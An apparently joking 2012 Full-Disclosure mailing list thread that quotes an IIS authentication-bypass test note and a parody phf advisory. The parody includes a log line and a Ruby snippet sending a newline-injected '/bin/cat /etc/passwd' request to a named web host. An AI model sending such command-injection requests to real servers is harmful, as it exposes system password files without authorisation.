Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny!
---------- I actually got nothing against you personally but its boring when you use the same tactic over and over :/ mix things up and make it interesting! On Jul 17, 2012 8:24 AM, "Григорий Братислава" <[email protected]> wrote: > On Tue, Jul 17, 2012 at 10:11 AM, king cope > <[email protected]> wrote: > > Hello Jan, > > I did some additional tests for the IIS bugs. > > > > * IIS 6.0 PHP authentication bypass is only possible on Windows Server > > 2003 SP1. SP2 seems unaffected > > So take that bug as resolved, my mistake as I didn't have a fully > > patched system online when testing. > > kingcope are we is release advisories to patched software? Is so, then > I introduce exploit along with you. > > Hello full disclosure!! !! !! > > Is like to warn you about phf vulnerability. Is hackers can get your > password list in is unpatched server. > > PoC on is my system: > > 213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET > /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 - > > In Ruby (here we is own rsnake): > > require 'open-uri' > open(' > http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd > HTTP/1.0'){ |f| print f.read } > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
